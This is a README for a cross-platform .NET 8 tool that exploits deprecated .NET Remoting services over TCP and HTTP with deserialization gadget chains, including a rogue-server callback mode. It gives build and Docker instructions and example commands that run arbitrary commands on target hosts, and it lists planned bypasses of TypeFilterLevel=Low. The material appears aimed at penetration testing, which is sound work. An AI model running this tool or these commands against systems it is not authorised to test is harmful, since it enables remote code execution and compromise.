Cross-platform .NET 8 tool for exploiting legacy .NET Remoting services. Supports both TCP and HTTP channels with inline payload generation. No .NET Framework dependency, no ysoserial.net required at runtime.
Built on research and prior work by:
.
├── README.md # This file
├── RemotingReloaded/ # Main .NET solution
│ └── README.md # Tool usage and flags
└── Scripts/ # Scripts for generating wordlists
└── README.md # Script usage
.NET Remoting services are still present in a lot of enterprise environments despite the technology being deprecated forever ago.
When exposed on the network, they are typically exploitable via deserialization gadget chains because BinaryFormatter and SoapFormatter are used on the wire.
This tool automates that exploitation for both TCP (BinaryFormatter) and HTTP (SoapFormatter) channels.
It handles payload generation internally, so there is no dependency on any tooling.
Runs on Linux, macOS (untested but should be fine), and Windows.
Supported attack chains:
- TypeConfuseDelegate (TCP, directly sent): raw NRBF bytes sent directly to the remoting channel.
- ObjRef + Rogue Server (TCP/HTTP): sends an ObjRef trigger pointing at a built-in rogue TCP server. Target phones home, rogue server delivers TypeConfuseDelegate. Safer than direct send.
- TextFormattingRunProperties (HTTP, direct): XAML ObjectDataProvider gadget wrapped in a SOAP envelope, exploits
XamlReader.Parse()on the target.
Download the appropriate binary for your platform from the Releases page. No runtime installation required, all binaries are self-contained.
| Platform | File |
|---|---|
| Linux x64 | RemotingReloaded-linux-x64 |
| Windows x64 | RemotingReloaded-win-x64.exe |
| macOS x64 | RemotingReloaded-osx-x64 |
| macOS ARM64 | RemotingReloaded-osx-arm64 |
# Linux / macOS make executable
chmod +x RemotingReloaded-linux-x64
# Single target
./RemotingReloaded-linux-x64 -t tcp://192.168.1.10:4242 -c "whoami > /tmp/pwned"
# Windows
## CMD
RemotingReloaded-win-x64.exe -t tcp://192.168.1.10:4242 -c "calc.exe"
## PowerShell
.\RemotingReloaded-win-x64.exe -t tcp://192.168.1.10:4242 -c "calc.exe"Requires .NET 8 SDK.
cd RemotingReloaded
dotnet build -c Release
# Or publish a self-contained single binary
dotnet publish -c Release -r linux-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r osx-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r osx-arm64 --self-contained true -p:PublishSingleFile=true# Build the image (linux-x64)
docker build -t remoting-reloaded .
# Single inline target
docker run --rm --network host remoting-reloaded -t tcp://192.168.1.10:4242 -c "calc.exe"
# Targets file with log output (you can use volumes to persist logs or use custom wordlists)
docker run --rm --network host \
-v $(pwd)/data:/data \
remoting-reloaded \
-t /data/targets.txt -c "calc.exe" --log-file /data/run.logNote:
--network hostis required for ObjRef/rogue server mode so the target can reach the rogue TCP listener on your machine. If your targets are remote, ensure your rogue server port (default54321) is reachable from the target network.
See RemotingReloaded/README.md for further example usage of the tool.
| Feature | Status |
|---|---|
| TCP exploitation (TypeFilterLevel = Full) | Done |
| HTTP exploitation (TypeFilterLevel = Full) | Done |
| ObjRef / rogue server mode | Done |
| Built-in wordlist | Done |
| TypeFilterLevel = Low bypasses | Not yet implemented |
| Secure channel (authenticated TCP) | Not yet implemented |
The following are areas for future exploration if time allows.
- TypeFilterLevel = Low bypasses: Services configured with
typeFilterLevel = Lowblock the current gadget chains via CAS. Bypasses exist (lease-based techniques, IRemotingTypeInfo tricks) but require further development to be implemented. - Authenticated TCP channels: Secure channels with Windows/Kerberos auth currently cause the tool to hang. Support would require research and development to handle SSPI negotiation and authentication that the .NET Framework client normally handles.